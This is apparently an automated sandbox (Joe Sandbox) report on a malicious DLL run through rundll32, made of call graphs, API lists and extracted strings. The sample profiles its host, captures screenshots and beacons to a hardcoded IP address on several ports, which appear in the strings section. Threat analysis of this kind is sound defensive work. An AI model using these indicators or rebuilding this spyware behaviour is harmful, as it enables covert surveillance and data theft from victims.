NtCreateFile 111142->111177 111145 6cc57bc7 closesocket 111144->111145 111146 6cc57b9e 111144->111146 111145->110514 111189 6cbf51f4 29 API calls 111146->111189 111148 6cc57ba6 111149 6cc57bbd 111148->111149 111190 6cbf4e65 29 API calls 111148->111190 111151 6cbc5ad0 RtlFreeHeap 111149->111151 111151->111145 111152->110493 111153->110530 111154->110531 111155->110539 111156->110539 111157->110530 111158->110506 111159->110506 111166->110514 111172 6cc576d2 111171->111172 111173 6cc576c9 111171->111173 111176 6cc624a0 26 API calls 111172->111176 111173->111131 111178 6cbf4883 RtlNtStatusToDosError 111177->111178 111179 6cbf48e2 CreateIoCompletionPort 111177->111179 111187 6cbc6110 26 API calls 111178->111187 111181 6cbf4905 SetFileCompletionNotificationModes 111179->111181 111182 6cbf4924 GetLastError CloseHandle 111179->111182 111181->111182 111184 6cbf4915 111181->111184 111182->111184 111183 6cbf48c7 111183->111179 111185 6cbf4c31 111184->111185 111188 6cc469bc 26 API calls 111184->111188 111187->111183 111188->111185 111189->111148 111190->111149 111191->110568 111192->110574 111193->110645 111194->110598 111195->110604 111196->110605 111197->110604 111198->110621 111199->110636 111200->110645 111201->110589 111203->110594 111204->110578 111205->110637 111206->110612 111207->110637 111208->110669 111209->110641 111210->110586 111211->110574 111212->110676 111213->110680 111214->110676 111215->110685 111216->110689 111217->110697 111218->110690 111219->110705 111220->110711 111221->110723 111222->110736 111223->110742 111224->110743 111225->110742 111226->110760 111227->110775 111228->110723 111229->110727 111231->110728 111232->110724 111233->110776 111234->110750 111235->110776 111236->110758 111237->110784 111238->110722 111239->110711 111241->110864 111242->110846 111243->110864 111244->110853 111245->110865 111246->110832 111247->110872 111248->110886 111250->110032 111251->109963 111252->109971 111253->109965 111254->109979 111255->109983 111256->109988 111257->110001 111258->109992 111259->110004 111260->110027 111261->110015 111262->110036 111263->110042 111264->109978 111265->109982 111266->110044 111269->109997 111270->110016 111271->110005 111272->110013 111273->110021 111274->110032 111275->109962 111277->109726 111278->109735 111280->109735 111281->109735 111282->109731 111283->109734 111284 6cbf59e4 111285 6cbf5a05 GetQueuedCompletionStatusEx 111284->111285 111287 6cbf5ad1 GetLastError 111285->111287 111288 6cbf5ac0 111285->111288 111289 6cbf5ac7 111287->111289 111288->111289 111294 6cc62270 26 API calls 111288->111294 111295 6cbc3942 111296 6cbc3993 111295->111296 111297 6cc46a1a RtlFreeHeap 111296->111297 111298 6cbc399e 111297->111298 111299 6cbc39ad 111298->111299 111300 6cbc39a2 SetThreadErrorMode 111298->111300 111301 6cbc5872 111299->111301 111435 6cbf397d 111299->111435 111300->111299 111482 6cc624e0 26 API calls 111301->111482 111303 6cbc39db GetProcAddress 111306 6cbc3a2a 111303->111306 111439 6cbc11ec 111306->111439 111308 6cbc3a3a 111311 6cbf397d 29 API calls 111308->111311 111310 6cbc5a08 111484 6cc61e20 26 API calls 111310->111484 111314 6cbc3ab5 GetProcAddress 111311->111314 111313 6cbc5a18 111485 6cc621d0 26 API calls 111313->111485 111318 6cbc3b04 111314->111318 111320 6cbc11ec RtlFreeHeap 111318->111320 111321 6cbc3b14 111320->111321 111323 6cbf397d 29 API calls 111321->111323 111325 6cbc3b8f GetProcAddress 111323->111325 111327 6cbc3be5 111325->111327 111328 6cbc11ec RtlFreeHeap 111327->111328 111329 6cbc3bf5 111328->111329 111330 6cbc584b 111329->111330 111331 6cbc3cb7 111329->111331 111450 6cc4fdd0 30 API calls __aulldiv 111329->111450 111483 6cc624e0 26 API calls 111330->111483 111334 6cc492c0 26 API calls 111331->111334 111333 6cbc3cd8 111451 6cc50060 26 API calls 111333->111451 111335 6cbc3cfd 111334->111335 111337 6cc35107 26 API calls 111335->111337 111410 6cbc3d04 111337->111410 111339 6cbc580f 111340 6cc62860 26 API calls 111339->111340 111342 6cbc5819 111340->111342 111477 6cc61e20 26 API calls 111342->111477 111344 6cbc5827 111478 6cc621d0 26 API calls 111344->111478 111346 6cbc5834 111479 6cc62270 26 API calls 111346->111479 111350 6cbc52b5 111464 6cc35891 RtlFreeHeap 111350->111464 111351 6cbc5841 111480 6cc625b0 26 API calls 111351->111480 111354 6cbe7384 26 API calls 111354->111410 111355 6cbc5702 111356 6cbc57b9 111355->111356 111368 6cbc571f 111355->111368 111475 6cc3479f 46 API calls 111356->111475 111360 6cbc52a9 111446 6cc19135 111360->111446 111361 6cc0c75a 26 API calls 111361->111410 111362 6cbc57dc 111476 6cc621d0 26 API calls 111362->111476 111364 6cc60391 memcmp 111364->111410 111367 6cbf3b30 27 API calls 111367->111410 111368->111360 111474 6cc35891 RtlFreeHeap 111368->111474 111377 6cbc5307 111377->111330 111379 6cbc538b 111377->111379 111465 6cc4fdd0 30 API calls __aulldiv 111377->111465 111378 6cc467e8 3 API calls 111378->111410 111383 6cc492c0 26 API calls 111379->111383 111381 6cbc51f1 memmove 111381->111410 111382 6cbc53ac 111466 6cc50060 26 API calls 111382->111466 111387 6cbc53d7 111383->111387 111384 6cbf3b68 RtlFreeHeap 111384->111410 111389 6cc35107 26 API calls 111387->111389 111390 6cbc53de memmove 111389->111390 111403 6cbc5429 111390->111403 111392 6cc35358 51 API calls 111392->111403 111393 6cbc47c2 111486 6cc62720 26 API calls 111393->111486 111394 6cbf3c53 26 API calls 111394->111410 111395 6cbc4d32 111481 6cc625b0 26 API calls 111395->111481 111399 6cbc4d4f memmove 111399->111410 111401 6cbf3b84 26 API calls 111401->111410 111403->111392 111406 6cbc54b0 111403->111406 111467 6cc4a520 30 API calls 111403->111467 111468 6cc4fdd0 30 API calls __aulldiv 111403->111468 111469 6cc599b8 28 API calls 111403->111469 111470 6cc4a6f0 30 API calls 111403->111470 111404 6cbf3bce memcmp 111404->111410 111408 6cc19135 RtlFreeHeap 111406->111408 111407 6cc11676 memcmp 111407->111410 111411 6cbc5511 111408->111411 111410->111313 111410->111339 111410->111342 111410->111344 111410->111346 111410->111350 111410->111351 111410->111354 111410->111355 111410->111360 111410->111361 111410->111362 111410->111364 111410->111367 111410->111378 111410->111381 111410->111384 111410->111393 111410->111394 111410->111395 111410->111401 111410->111404 111410->111407 111444 6cc35358 111410->111444 111452 6cbdd702 27 API calls 111410->111452 111453 6cbf3c99 memcmp 111410->111453 111454 6cbf3a94 26 API calls 111410->111454 111455 6cbf3bd9 27 API calls 111410->111455 111456 6cbcdef4 26 API calls 111410->111456 111457 6cbce1da 26 API calls 111410->111457 111458 6cbcdef4 26 API calls 111410->111458 111459 6cc35891 RtlFreeHeap 111410->111459 111460 6cc4a520 30 API calls 111410->111460 111461 6cc4fdd0 30 API calls __aulldiv 111410->111461 111462 6cc599b8 28 API calls 111410->111462 111463 6cc4a6f0 30 API calls 111410->111463 111411->111330 111412 6cc467e8 3 API calls 111411->111412 111413 6cbc555f 111412->111413 111413->111310 111414 6cbc5573 memmove 111413->111414 111415 6cbc559a 111414->111415 111415->111330 111416 6cbc55b0 GetCurrentProcess 111415->111416 111417 6cbc55d8 111416->111417 111418 6cbc561b memmove GetCurrentProcess 111417->111418 111419 6cbc55f0 111417->111419 111420 6cbc5663 111418->111420 111471 6cc4eea0 28 API calls 111419->111471 111422 6cbc5745 111420->111422 111423 6cbc5672 GetCurrentProcess 111420->111423 111426 6cbc574b CreateWaitableTimerExW 111422->111426 111423->111419 111424 6cbc56dc 111472 6cbf5758 RtlFreeHeap 111424->111472 111428 6cbc57ac Sleep 111426->111428 111429 6cbc575c SetWaitableTimer 111426->111429 111427 6cbc56e9 111473 6cbf5758 RtlFreeHeap 111427->111473 111428->111426 111431 6cbc578c WaitForSingleObject CloseHandle 111429->111431 111432 6cbc57a5 CloseHandle 111429->111432 111431->111426 111434 6cbc57a3 111431->111434 111432->111428 111433 6cbc56f4 FreeLibrary 111434->111428 111436 6cbf398f 111435->111436 111437 6cbf3999 111435->111437 111487 6cbc5c70 29 API calls 111436->111487 111437->111303 111440 6cbc11ff 111439->111440 111441 6cbc11f1 111439->111441 111440->111308 111488 6cbc11dc RtlFreeHeap 111441->111488 111443 6cbc11fe 111443->111308 111489 6cc35379 51 API calls 111444->111489 111447 6cc19159 111446->111447 111448 6cc1913b 111446->111448 111447->111377 111448->111447 111449 6cbc5ad0 RtlFreeHeap 111448->111449 111449->111447 111450->111333 111451->111331 111452->111410 111453->111410 111454->111410 111455->111410 111456->111410 111457->111410 111458->111399 111459->111410 111460->111410 111461->111410 111462->111410 111463->111410 111464->111360 111465->111382 111466->111379 111467->111403 111468->111403 111469->111403 111470->111403 111471->111424 111472->111427 111473->111433 111474->111360 111475->111360 111487->111437 111488->111443 111490 6cc36d3c 111534 6cc36d7f 111490->111534 111499 6cc37756 111565 6cbf58f1 27 API calls 111499->111565 111502 6cc3770a 111503 6cc373e9 AcceptSecurityContext 111503->111534 111504 6cc36f27 CertGetCertificateChain 111506 6cc3705f GetLastError 111504->111506 111504->111534 111506->111534 111507 6cc37458 InitializeSecurityContextW 111507->111534 111508 6cc47325 CertEnumCertificatesInStore CertDuplicateCertificateContext 111508->111534 111511 6cc37107 CertVerifyCertificateChainPolicy 111512 6cc371da GetLastError 111511->111512 111511->111534 111515 6cc3720f CertFreeCertificateChain 111512->111515 111513 6cc374c0 FreeContextBuffer 111513->111534 111515->111534 111516 6cc3778c 111566 6cc3696c RtlFreeHeap 111516->111566 111517 6cc376f1 CertFreeCertificateChain 111517->111534 111521 6cc37799 111567 6cbda132 RtlFreeHeap 111521->111567 111522 6cc36977 26 API calls 111522->111534 111524 6cc36ed3 CertFreeCertificateContext CertFreeCertificateContext 111524->111534 111525 6cc379f5 27 API calls 111525->111534 111528 6cc370c6 CertFreeCertificateChain 111528->111534 111530 6cc37563 FreeContextBuffer 111530->111534 111532 6cc11676 memcmp 111532->111534 111533 6cc375f4 FreeContextBuffer 111533->111534 111534->111499 111534->111502 111534->111503 111534->111504 111534->111507 111534->111508 111534->111511 111534->111513 111534->111515 111534->111516 111534->111517 111534->111522 111534->111524 111534->111525 111534->111528 111534->111532 111535 6cc37809 111534->111535 111542 6cc472af QueryContextAttributesW 111534->111542 111544 6cc47397 111534->111544 111547 6cc36924 111534->111547 111550 6cc3ecc8 26 API calls 111534->111550 111551 6cc369f7 RtlFreeHeap 111534->111551 111552 6cc472ee CertAddCertificateContextToStore GetLastError 111534->111552 111553 6cc472dc CertCloseStore 111534->111553 111554 6cc46d4b CertDuplicateCertificateChain CertFreeCertificateChain CertFreeCertificateChain 111534->111554 111555 6cc46ddc CertDuplicateCertificateContext 111534->111555 111556 6cc10bd1 RtlFreeHeap 111534->111556 111557 6cc378cd 52 API calls 111534->111557 111558 6cc46f4b 29 API calls 111534->111558 111559 6cc36939 26 API calls 111534->111559 111560 6cc46438 27 API calls 111534->111560 111561 6cc46438 27 API calls 111534->111561 111562 6cc3696c RtlFreeHeap 111534->111562 111563 6cbda132 RtlFreeHeap 111534->111563 111564 6cc4725d QueryContextAttributesW 111534->111564 111538 6cc37836 111535->111538 111537 6cc378bb 111581 6cc622d0 26 API calls 111537->111581 111538->111537 111541 6cc378a0 111538->111541 111568 6cc36a0c 40 API calls 111538->111568 111569 6cc58739 111538->111569 111541->111534 111543 6cc472c6 111542->111543 111543->111534 111545 6cc4739c CertDuplicateStore 111544->111545 111546 6cc473aa 111544->111546 111545->111546 111546->111534 111589 6cc358cd 111547->111589 111550->111534 111551->111534 111552->111534 111553->111504 111554->111534 111555->111534 111556->111534 111557->111534 111558->111534 111559->111534 111560->111530 111561->111533 111562->111534 111563->111534 111564->111534 111565->111502 111566->111521 111567->111502 111568->111538 111578 6cc5876e 111569->111578 111571 6cc588d1 111588 6cc625b0 26 API calls 111571->111588 111572 6cc587ad send 111574 6cc587d1 WSAGetLastError 111572->111574 111572->111578 111574->111578 111575 6cc588a7 111575->111538 111578->111571 111578->111572 111578->111575 111580 6cbf5588 RtlFreeHeap 111578->111580 111582 6cc57ee3 111578->111582 111585 6cbf4da7 35 API calls 111578->111585 111586 6cc57cef 26 API calls 111578->111586 111587 6cbe7fe5 RtlFreeHeap 111578->111587 111580->111578 111583 6cc57d41 41 API calls 111582->111583 111584 6cc57eee 111583->111584 111584->111578 111585->111578 111586->111578 111587->111578 111592 6cbe733e 111589->111592 111593 6cbe735d 111592->111593 111594 6cbe734a 111592->111594 111598 6cc62550 26 API calls 111593->111598 111595 6cbe7352 111594->111595 111599 6cc62270 26 API calls 111594->111599 111595->111534

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 4db53c0-4db5447 call 4dbf667 call 4dc67e0 * 3 gethostname gethostbyname 9 4db544d-4db5494 inet_ntoa call 4dc032d * 2 0->9 10 4db54ec-4db5629 MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 4db7410 GetSystemInfo wsprintfW call 4db6be0 call 4db6e60 GetForegroundWindow 0->10 9->10 20 4db5496-4db5498 9->20 23 4db562b-4db5638 GetWindowTextW 10->23 24 4db563e-4db564c 10->24 22 4db54a0-4db54ea inet_ntoa call 4dc032d * 2 20->22 22->10 23->24 26 4db5658-4db567c lstrlenW call 4db6cf0 24->26 27 4db564e 24->27 33 4db568e-4db56b2 call 4dbf7d6 26->33 34 4db567e-4db568b call 4dbf7d6 26->34 27->26 39 4db56be-4db56e2 lstrlenW call 4db6cf0 33->39 40 4db56b4 33->40 34->33 43 4db56f4-4db5745 GetModuleHandleW GetProcAddress 39->43 44 4db56e4-4db56f1 call 4dbf7d6 39->44 40->39 46 4db5752-4db5759 GetSystemInfo 43->46 47 4db5747-4db5750 GetNativeSystemInfo 43->47 44->43 49 4db575f-4db576d 46->49 47->49 50 4db5779-4db577e 49->50 51 4db576f-4db5777 49->51 53 4db5785-4db57ac wsprintfW call 4db6a00 GetCurrentProcessId 50->53 51->50 52 4db5780 51->52 52->53 56 4db57ae-4db57c8 OpenProcess 53->56 57 4db5811-4db5818 call 4db6620 53->57 56->57 59 4db57ca-4db57df K32GetProcessImageFileNameW 56->59 63 4db582a-4db5837 57->63 64 4db581a-4db5828 57->64 61 4db57ea-4db57f2 call 4db8060 59->61 62 4db57e1-4db57e8 59->62 68 4db57f7-4db57f9 61->68 65 4db580b CloseHandle 62->65 67 4db5838-4db592d call 4dbf7d6 call 4db6420 call 4db60e0 call 4dbfb6e GetTickCount call 4dc039a call 4dc0306 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 63->67 64->67 65->57 83 4db5958-4db5979 67->83 84 4db592f-4db5956 67->84 70 4db57fb-4db5802 68->70 71 4db5804-4db580a 68->71 70->65 71->65 85 4db597a-4db59a3 call 4db59c0 call 4db3160 call 4dbef59 83->85 84->85 90 4db59a8-4db59bd call 4dbef64 85->90
                              APIs
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • _memset.LIBCMT ref: 04DB53FC
                              • _memset.LIBCMT ref: 04DB5415
                              • _memset.LIBCMT ref: 04DB5425
                              • gethostname.WS2_32(?,00000032), ref: 04DB5433
                              • gethostbyname.WS2_32(?), ref: 04DB543D
                              • inet_ntoa.WS2_32 ref: 04DB5455
                              • _strcat_s.LIBCMT ref: 04DB5468
                              • _strcat_s.LIBCMT ref: 04DB5481
                              • inet_ntoa.WS2_32 ref: 04DB54AA
                              • _strcat_s.LIBCMT ref: 04DB54BD
                              • _strcat_s.LIBCMT ref: 04DB54D6
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB5503
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB5517
                              • GetLastInputInfo.USER32(?), ref: 04DB552A
                              • GetTickCount.KERNEL32 ref: 04DB5530
                              • wsprintfW.USER32 ref: 04DB5565
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 04DB5578
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 04DB558C
                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04DB55E3
                              • wsprintfW.USER32 ref: 04DB55FC
                              • GetForegroundWindow.USER32 ref: 04DB5621
                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 04DB5638
                              • lstrlenW.KERNEL32(000008CC), ref: 04DB565F
                              • lstrlenW.KERNEL32(00000994), ref: 04DB56C5
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 04DB5736
                              • GetProcAddress.KERNEL32(00000000), ref: 04DB573D
                              • GetNativeSystemInfo.KERNEL32(?), ref: 04DB574E
                              • GetSystemInfo.KERNEL32(?), ref: 04DB5759
                              • wsprintfW.USER32 ref: 04DB5792
                              • GetCurrentProcessId.KERNEL32 ref: 04DB57A4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04DB57BA
                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 04DB57D7
                              • CloseHandle.KERNEL32(04DD5164), ref: 04DB580B
                              • GetTickCount.KERNEL32 ref: 04DB5875
                              • __time64.LIBCMT ref: 04DB5884
                              • __localtime64.LIBCMT ref: 04DB58BB
                              • wsprintfW.USER32 ref: 04DB58F4
                              • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 04DB5909
                              • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 04DB5918
                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 04DB5925
                                • Part of subcall function 04DB8060: GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000AD4,75BF73E0,00000000), ref: 04DB80A2
                                • Part of subcall function 04DB8060: lstrcmpiW.KERNEL32(?,A:\), ref: 04DB80D6
                                • Part of subcall function 04DB8060: lstrcmpiW.KERNEL32(?,B:\), ref: 04DB80E6
                                • Part of subcall function 04DB8060: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DB8116
                                • Part of subcall function 04DB8060: lstrlenW.KERNEL32(?), ref: 04DB8127
                                • Part of subcall function 04DB8060: __wcsnicmp.LIBCMT ref: 04DB813E
                                • Part of subcall function 04DB8060: lstrcpyW.KERNEL32(00000AD4,?), ref: 04DB8174
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                              • String ID: %d min$1.0$2024.12.19$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                              • API String ID: 1101047656-3885306478
                              • Opcode ID: a9bf0a2291f239a99b1a7eab1be56aa66f17508423fe9dc6a9b17a3a6c80700f
                              • Instruction ID: 8eb93ed12fd88febd644cbf1ea067a9b265202bf40c19dfada239805d5ee7708
                              • Opcode Fuzzy Hash: a9bf0a2291f239a99b1a7eab1be56aa66f17508423fe9dc6a9b17a3a6c80700f
                              • Instruction Fuzzy Hash: B1F194B1A40304EFDB24DF64DC95FDB77B8EB48704F004599E64A97281EA70BA48CFA5
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000C0), ref: 6CC14875
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14886
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC149AB
                              • memmove.VCRUNTIME140(?,?,00000148), ref: 6CC149DF
                              • memmove.VCRUNTIME140(?,?,00000148), ref: 6CC149F7
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC14A3A
                              • memmove.VCRUNTIME140(?,?,00000188), ref: 6CC14A7C
                              • memmove.VCRUNTIME140(?,?,00000029), ref: 6CC14C4B
                              Strings
                              • P, xrefs: 6CC15FC1
                              • uri host is valid header value, xrefs: 6CC17895
                              • authority implies host, xrefs: 6CC178AD
                              • domain is valid Uri, xrefs: 6CC17849
                              • Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs, xrefs: 6CC177E9
                              • U9W{, xrefs: 6CC152AE
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC17801, 6CC17861
                              • cannot poll Select twice, xrefs: 6CC14981
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC177D7
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: Flatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\future\flatten.rs$Map must not be polled after it returned `Poll::Ready`$P$U9W{$authority implies host$cannot poll Select twice$domain is valid Uri$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$uri host is valid header value
                              • API String ID: 2162964266-2968858985
                              • Opcode ID: 89c07fd8daf8fa2dd9149a52f704617244ee20b63103b2520ec36aebe06c20e3
                              • Instruction ID: 0317d301c40fabf3bec3093f9c03f72e67419c72de84c5b0beba167c027f4d33
                              • Opcode Fuzzy Hash: 89c07fd8daf8fa2dd9149a52f704617244ee20b63103b2520ec36aebe06c20e3
                              • Instruction Fuzzy Hash: 7753AD71908B818FD721CF25C480B9BB7E1FF89314F04896DE8895FB51EB70A949DB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 717 4dbde70-4dbded2 call 4dc04a0 Sleep 720 4dbdef7-4dbdefd 717->720 721 4dbded4-4dbdef1 call 4dbf667 call 4dbf989 CloseHandle 717->721 723 4dbdeff call 4db75a0 720->723 724 4dbdf04-4dbdf79 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 4dbf989 CloseHandle call 4dbf667 720->724 721->720 723->724 733 4dbdf7b-4dbdf86 call 4db2c90 724->733 734 4dbdf88 724->734 736 4dbdf8c-4dbdfa6 call 4dbf667 733->736 734->736 740 4dbdfa8-4dbdfa9 call 4db9690 736->740 741 4dbdfb4 736->741 745 4dbdfae-4dbdfb2 740->745 742 4dbdfb8 741->742 744 4dbdfc3-4dbdfcf call 4db2c80 742->744 748 4dbe019-4dbe05a call 4dbf7d6 * 2 744->748 749 4dbdfd1-4dbe017 call 4dbf7d6 * 2 744->749 745->742 758 4dbe060-4dbe070 748->758 749->758 759 4dbe0b2-4dbe0ba 758->759 760 4dbe072-4dbe0ac call 4db2c80 call 4dbf7d6 * 2 758->760 762 4dbe0bc-4dbe0be 759->762 763 4dbe0c2-4dbe0c9 759->763 760->759 762->763 765 4dbe0cb-4dbe0d5 763->765 766 4dbe0d7-4dbe0db 763->766 768 4dbe0e1-4dbe0e7 765->768 766->768 770 4dbe0e9-4dbe103 EnumWindows 768->770 771 4dbe126-4dbe14e call 4dc04a0 call 4db2da0 768->771 770->771 774 4dbe105-4dbe124 Sleep EnumWindows 770->774 778 4dbe160-4dbe20c call 4dc04a0 CreateEventA call 4dbf7d6 call 4dbc9f0 771->778 779 4dbe150-4dbe15b Sleep 771->779 774->771 774->774 787 4dbe217-4dbe21d 778->787 779->744 788 4dbe278-4dbe28c call 4db53c0 787->788 789 4dbe21f-4dbe253 Sleep RegOpenKeyExW 787->789 793 4dbe291-4dbe297 788->793 790 4dbe271-4dbe276 789->790 791 4dbe255-4dbe26b RegQueryValueExW 789->791 790->787 790->788 791->790 794 4dbe2ca-4dbe2d0 793->794 795 4dbe299-4dbe2c5 CloseHandle 793->795 796 4dbe2d2-4dbe2ee call 4dbf989 794->796 797 4dbe2f0 794->797 795->744 800 4dbe2f4 796->800 797->800 802 4dbe2f6-4dbe2fd 800->802 803 4dbe2ff-4dbe30e Sleep 802->803 804 4dbe36d-4dbe380 802->804 803->802 805 4dbe310-4dbe317 803->805 808 4dbe392-4dbe3cc call 4dc04a0 Sleep CloseHandle 804->808 809 4dbe382-4dbe38c WaitForSingleObject CloseHandle 804->809 805->804 806 4dbe319-4dbe32b 805->806 812 4dbe33d-4dbe368 Sleep CloseHandle 806->812 813 4dbe32d-4dbe337 WaitForSingleObject CloseHandle 806->813 808->744 809->808 812->744 813->812
                              APIs
                                • Part of subcall function 04DC04A0: __fassign.LIBCMT ref: 04DC0496
                              • Sleep.KERNEL32(00000000), ref: 04DBDEC4
                              • CloseHandle.KERNEL32(00000000), ref: 04DBDEF1
                              • GetLocalTime.KERNEL32(?), ref: 04DBDF09
                              • wsprintfW.USER32 ref: 04DBDF40
                              • SetUnhandledExceptionFilter.KERNEL32(04DB7530), ref: 04DBDF4E
                              • CloseHandle.KERNEL32(00000000), ref: 04DBDF67
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • EnumWindows.USER32(04DB5C50,?), ref: 04DBE0FD
                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04DBE10A
                              • EnumWindows.USER32(04DB5C50,?), ref: 04DBE11E
                              • Sleep.KERNEL32(00000BB8), ref: 04DBE155
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04DBE1A1
                              • Sleep.KERNEL32(00000FA0), ref: 04DBE224
                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 04DBE24B
                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 04DBE26B
                              • CloseHandle.KERNEL32(?), ref: 04DBE2BD
                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DBE304
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DBE330
                              • CloseHandle.KERNEL32(?,?,?), ref: 04DBE337
                              • Sleep.KERNEL32(000003E8,?,?), ref: 04DBE342
                              • CloseHandle.KERNEL32(?), ref: 04DBE360
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 04DBE385
                              • CloseHandle.KERNEL32(?,?,?), ref: 04DBE38C
                              • Sleep.KERNEL32(00000000,?,?,?), ref: 04DBE3A6
                              • CloseHandle.KERNEL32(?), ref: 04DBE3C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$45.204.213.99$45.204.213.99$45.204.213.99$45.204.213.99$7677$7677$7688$7699$Console$IpDatespecial
                              • API String ID: 1511462596-2426941330
                              • Opcode ID: 9d9c3fffa0c8ba2052c2a5a2833f075f7c45e9591157ab0f0f542bbca049e0c1
                              • Instruction ID: 28378ad821304ca9f1c21356f41fb348e875ce7e72b2edf5724d26c1dc38dfc6
                              • Opcode Fuzzy Hash: 9d9c3fffa0c8ba2052c2a5a2833f075f7c45e9591157ab0f0f542bbca049e0c1
                              • Instruction Fuzzy Hash: 30D1D2B0645341EFD321EF64DC95EAA7BA5FBC9704F000A1CF5969B380DB74A804CBA2

                              Control-flow Graph

                              APIs
                              • GetDesktopWindow.USER32 ref: 04DBBC0F
                              • GetDC.USER32(00000000), ref: 04DBBC1C
                              • CreateCompatibleDC.GDI32(00000000), ref: 04DBBC22
                              • GetDC.USER32(00000000), ref: 04DBBC2D
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 04DBBC3A
                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 04DBBC42
                              • ReleaseDC.USER32(00000000,00000000), ref: 04DBBC53
                              • GetSystemMetrics.USER32(0000004E), ref: 04DBBC78
                              • GetSystemMetrics.USER32(0000004F), ref: 04DBBCA6
                              • GetSystemMetrics.USER32(0000004C), ref: 04DBBCF8
                              • GetSystemMetrics.USER32(0000004D), ref: 04DBBD0D
                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 04DBBD26
                              • SelectObject.GDI32(?,00000000), ref: 04DBBD34
                              • SetStretchBltMode.GDI32(?,00000003), ref: 04DBBD40
                              • GetSystemMetrics.USER32(0000004F), ref: 04DBBD4D
                              • GetSystemMetrics.USER32(0000004E), ref: 04DBBD60
                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 04DBBD87
